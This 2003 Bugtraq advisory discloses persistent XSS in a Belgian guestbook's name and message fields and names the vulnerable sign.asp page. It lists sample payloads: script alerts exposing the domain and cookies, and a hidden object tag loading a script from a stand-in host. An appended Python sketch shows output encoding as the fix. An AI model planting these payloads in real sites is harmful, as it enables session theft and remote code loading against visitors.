Bugtraq: PtHProductions Gastenboek - XSS

From: morning_wood <se_cur_ity_at_hotmail.com>
Date: Mon, 1 Sep 2003 09:57:43 -0700

------------------------------------------------------------------
          - EXPL-A-2003-022 exploitlabs.com Advisory 022
------------------------------------------------------------------
                -= PtHProductions Gastenboek =-

Donnie Werner
Aug, 29 2003

Vulnerability(s):
-----------------
1. Persistent XSS injection

Product:
--------
PtHProductions Gastenboek

Description of product:
-----------------------
Guestbook for / by www.pthproductions.be

VULNERABILITY / EXPLOIT
=======================
message and name fields allow XSS injection

view - Bekijk gastenboek
post - Teken gastenboek
 
http://www.pthproductions.be/jongeren/Gastenboek/sign.asp

input XSS of your choice
<SCRIPT>alert(document.domain);</SCRIPT>
<SCRIPT>alert(document.cookie);</SCRIPT>
or
<object style="display:none" data="http://verybad-exploit-url/bad.js"></object>

Local:
------
no

Remote:
-------
yes

Vendor Fix:
-----------
No fix on 0day

Vendor Contact:
---------------
helpdesk_at_pthproductions.be
Concurrent with this advisory

Credits:
--------
Donnie Werner
morning_wood_at_e2-labs.com
exploited? http://exploitlabs.com
Received on Sep 02 2003
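
Added example, not part of the original advisory or the vendor's code: a Python sketch of a guestbook view page that renders the stored name and message fields first as-is and then with HTML output encoding, followed by a check for markup the template never emits. The row template, function names and benign entry are assumptions, and the sample rows are constructed from the strings quoted in the advisory; in the ASP application itself the equivalent output-time call is Server.HTMLEncode.

```python
import html
from html.parser import HTMLParser

# Constructed sample entries: one benign row plus the strings quoted in the
# advisory, stored in the name or message field.
ENTRIES = [
    {"name": "Anna", "message": "Mooie site!"},
    {"name": "<SCRIPT>alert(document.domain);</SCRIPT>", "message": "hi"},
    {"name": "guest", "message": "<SCRIPT>alert(document.cookie);</SCRIPT>"},
    {"name": "guest", "message": '<object style="display:none" '
                                 'data="http://verybad-exploit-url/bad.js"></object>'},
]

ROW = "<div class='entry'><b>{name}</b><p>{message}</p></div>"  # assumed template
TEMPLATE_TAGS = {"div", "b", "p"}


def render_vulnerable(entries):
    """Stored values are concatenated into the page as-is (the reported flaw)."""
    return "".join(ROW.format(**e) for e in entries)


def render_encoded(entries):
    """Same template, but every stored value is HTML-encoded at output time."""
    return "".join(
        ROW.format(name=html.escape(e["name"]), message=html.escape(e["message"]))
        for e in entries
    )


class _TagCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def unexpected_tags(page):
    """Return tags in the rendered page that the template itself never emits."""
    collector = _TagCollector()
    collector.feed(page)
    collector.close()
    return sorted(set(collector.tags) - TEMPLATE_TAGS)


if __name__ == "__main__":
    print("unencoded:", unexpected_tags(render_vulnerable(ENTRIES)))
    print("encoded:  ", unexpected_tags(render_encoded(ENTRIES)))
```

The same `unexpected_tags` check can run as a regression test against any rendered guestbook page after a fix is deployed.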
